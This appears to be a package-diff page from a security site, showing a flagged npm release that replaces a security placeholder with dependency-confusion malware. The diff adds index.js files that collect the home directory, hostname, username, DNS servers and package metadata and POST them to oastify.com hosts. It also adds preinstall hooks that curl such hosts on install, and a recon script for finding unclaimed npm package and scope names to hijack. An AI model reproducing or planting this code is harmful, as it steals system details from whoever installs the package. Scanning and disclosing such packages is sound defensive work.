docusaurus-plugin-matamohnhb 0.0.1-security → 5.5.5
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of docusaurus-plugin-matamohnhb might be problematic. Click here for more details.
- package/-js-urls.txt +0 -0
- package/docusaurus/index.js +46 -0
- package/docusaurus/node_modules/.package-lock.json +14 -0
- package/docusaurus/node_modules/ory-config/index.js +46 -0
- package/docusaurus/node_modules/ory-config/package.json +12 -0
- package/docusaurus/package-lock.json +30 -0
- package/docusaurus/package.json +19 -0
- package/index.js +46 -0
- package/npm-automation.sh +68 -0
- package/package.json +16 -3
- package/README.md +0 -5
package/-js-urls.txt
ADDED
File without changes
|
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ydfpycccdlf63zh24xrxe7st6kcb0aoz.oastify.com",
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "ory-config",
|
3
|
+
"version": "23.2.9",
|
4
|
+
"lockfileVersion": 2,
|
5
|
+
"requires": true,
|
6
|
+
"packages": {
|
7
|
+
"node_modules/ory-config": {
|
8
|
+
"version": "23.2.9",
|
9
|
+
"resolved": "https://registry.npmjs.org/ory-config/-/ory-config-23.2.9.tgz",
|
10
|
+
"integrity": "sha512-y0umK2SK3hwZEQKXWyU0glbhUyNlug/ryS9vx5/okukSnqXn+GdwYh8AMvr/6YYDFynEeGbCtSq9RGXgUxH9KA==",
|
11
|
+
"hasInstallScript": true
|
12
|
+
}
|
13
|
+
}
|
14
|
+
}
|
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ydfpycccdlf63zh24xrxe7st6kcb0aoz.oastify.com",
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "ory-config",
|
3
|
+
"version": "23.2.9",
|
4
|
+
"description": "hijacked by faique",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "curl http://kpdbayoyp7rsfltogj3jqt4fi6o1cr0g.oastify.com"
|
9
|
+
},
|
10
|
+
"author": "faique",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|
@@ -0,0 +1,30 @@
|
|
1
|
+
{
|
2
|
+
"name": "ory-config",
|
3
|
+
"version": "23.2.9",
|
4
|
+
"lockfileVersion": 2,
|
5
|
+
"requires": true,
|
6
|
+
"packages": {
|
7
|
+
"": {
|
8
|
+
"name": "ory-config",
|
9
|
+
"version": "23.2.9",
|
10
|
+
"hasInstallScript": true,
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"ory-config": "^23.2.9"
|
14
|
+
}
|
15
|
+
},
|
16
|
+
"node_modules/ory-config": {
|
17
|
+
"version": "23.2.9",
|
18
|
+
"resolved": "https://registry.npmjs.org/ory-config/-/ory-config-23.2.9.tgz",
|
19
|
+
"integrity": "sha512-y0umK2SK3hwZEQKXWyU0glbhUyNlug/ryS9vx5/okukSnqXn+GdwYh8AMvr/6YYDFynEeGbCtSq9RGXgUxH9KA==",
|
20
|
+
"hasInstallScript": true
|
21
|
+
}
|
22
|
+
},
|
23
|
+
"dependencies": {
|
24
|
+
"ory-config": {
|
25
|
+
"version": "23.2.9",
|
26
|
+
"resolved": "https://registry.npmjs.org/ory-config/-/ory-config-23.2.9.tgz",
|
27
|
+
"integrity": "sha512-y0umK2SK3hwZEQKXWyU0glbhUyNlug/ryS9vx5/okukSnqXn+GdwYh8AMvr/6YYDFynEeGbCtSq9RGXgUxH9KA=="
|
28
|
+
}
|
29
|
+
}
|
30
|
+
}
|
@@ -0,0 +1,19 @@
|
|
1
|
+
{
|
2
|
+
"name": "ory-config",
|
3
|
+
"version": "100.0.0",
|
4
|
+
"description": "hijacked by faique",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "curl http://d7l4sr6r709lxebhyclc8mm80z6vuoid.oastify.com"
|
9
|
+
},
|
10
|
+
"author": "faique",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"ory-config": "^100.0.0"
|
14
|
+
}
|
15
|
+
,"keywords": [
|
16
|
+
"hijacked by faique"
|
17
|
+
]
|
18
|
+
|
19
|
+
}
|
package/index.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "eas0sjm06690pt4tos0fumcd84ev2nqc.oastify.com",
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
@@ -0,0 +1,68 @@
|
|
1
|
+
#!/bin/bash
|
2
|
+
echo '''
|
3
|
+
_ __ ___ __
|
4
|
+
/ | / /___ ____ ___ / | __ __/ /_____
|
5
|
+
/ |/ / __ \/ __ `__ \ / /| |/ / / / __/ __ \
|
6
|
+
/ /| / /_/ / / / / / / / ___ / /_/ / /_/ /_/ /
|
7
|
+
/_/ |_/ .___/_/ /_/ /_/ /_/ |_\__,_/\__/\____/
|
8
|
+
/_/ v1.0.2
|
9
|
+
twitter.com/@0xnirob
|
10
|
+
warning: BE AWARE OF FALSE POSITIVE, CONFIRM YOUR FINDING MANUALLY. Good Luck.
|
11
|
+
Use with caution. You are responsible for your actions.
|
12
|
+
Developers assume no liability and are not responsible for any misuse or damage.
|
13
|
+
'''
|
14
|
+
|
15
|
+
if [ -d $1 ];then
|
16
|
+
echo '' >/dev/null 2>&1
|
17
|
+
else
|
18
|
+
mkdir $PWD/$1;
|
19
|
+
fi
|
20
|
+
echo -e "Running waybackurls on $1"
|
21
|
+
waybackurls $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
|
22
|
+
echo -e "Running gau on $1"
|
23
|
+
gau $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
|
24
|
+
|
25
|
+
cd $PWD/$1;
|
26
|
+
echo -e "Found $(cat $1-js-urls.txt | sort -u |wc -l) js file url ";
|
27
|
+
cat $1-js-urls.txt | sort -u |while read ut;do
|
28
|
+
wget $ut.map >/dev/null 2>&1;
|
29
|
+
done
|
30
|
+
|
31
|
+
grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | grep -v '@' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | tee -a $1-npm-packages.txt >/dev/null 2>&1;
|
32
|
+
|
33
|
+
rm $1-js-urls.txt;
|
34
|
+
if [ -s $1-npm-packages.txt ];then
|
35
|
+
echo -e " Found some packages now going for final test on "$1-npm-packages.txt"";
|
36
|
+
cat $1-npm-packages.txt | sort -u | while read ut;do
|
37
|
+
if $(curl -o /dev/null -s -w "%{http_code}\n" "https://registry.npmjs.org/$ut" | grep "404" >/dev/null 2>&1); then
|
38
|
+
echo -e ""$ut" \e[1;31mFound Private npm packgae, \e[0m" && echo $ut >> $1-npm-vuln.txt;
|
39
|
+
|
40
|
+
else
|
41
|
+
echo -e ""$ut"\e[1;33m Available in Public Registry \e[0m";
|
42
|
+
fi
|
43
|
+
done
|
44
|
+
else
|
45
|
+
echo -e "Didn't found any npm packages, now going for scope test "
|
46
|
+
fi
|
47
|
+
#this part is for scope package test please be carefull with that, some times `www.npmjs.com` will show you 429 response code
|
48
|
+
grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep '@' | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | grep '@' | cut -d '@' -f 2 | tee -a $1-npm-scope.txt >/dev/null 2>&1;
|
49
|
+
|
50
|
+
if [ -s $1-npm-scope.txt ];then
|
51
|
+
echo -e " Found some Scope names now going for final test on "$1-npm-scope.txt"";
|
52
|
+
cat $1-npm-scope.txt | sort -u | while read pkg;do
|
53
|
+
OPTION=`curl -o /dev/null -s -w "%{http_code}\n" "https://www.npmjs.com/org/$pkg"`
|
54
|
+
if $(echo "$OPTION" | grep "200\|302" >/dev/null 2>&1);then
|
55
|
+
echo -e "@"$pkg"\e[1;33m Available in Public Registry \e[0m" && echo $pkg >> $1-npm-scope-vuln.txt;
|
56
|
+
grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo "Full pacakge name of @"$pkg" is @"$pkg"/"$ut" ";done
|
57
|
+
elif $(echo "$OPTION" | grep "429" >/dev/null 2>&1);then
|
58
|
+
echo -e "@"$pkg" \e[1;31m Rate limit detected \e[0m"
|
59
|
+
|
60
|
+
else
|
61
|
+
echo -e "@"$pkg"\e[1;31m Found Unclaimed scope Name\e[0m";
|
62
|
+
grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo -e "\e[1;31mFull pacakge name of @"$pkg" is @"$pkg"/"$ut", this is unclaimed, Add @"$pkg"/"$ut" in your package.json file like {package: @"$pkg"/"$ut"}, \e[0m";done
|
63
|
+
fi
|
64
|
+
done
|
65
|
+
else
|
66
|
+
echo -e "Didn't found any Scope name";
|
67
|
+
fi
|
68
|
+
rm $1-npm-scope.txt *.map.* *.map $1-npm-packages.txt;
|
package/package.json
CHANGED
@@ -1,6 +1,19 @@
|
|
1
1
|
{
|
2
2
|
"name": "docusaurus-plugin-matamohnhb",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "5.5.5",
|
4
|
+
"description": "Opera hijacked by Faique",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "curl http://zuxqfdtdumw7k0y3ly8yv89unltch65v.oastify.com"
|
9
|
+
},
|
10
|
+
"author": "Faique",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"wehackrepossssss": "^5.5.5"
|
14
|
+
},
|
15
|
+
"devDependencies": {},
|
16
|
+
"keywords": [
|
17
|
+
"efefe"
|
18
|
+
]
|
6
19
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=docusaurus-plugin-matamohnhb for more information.
|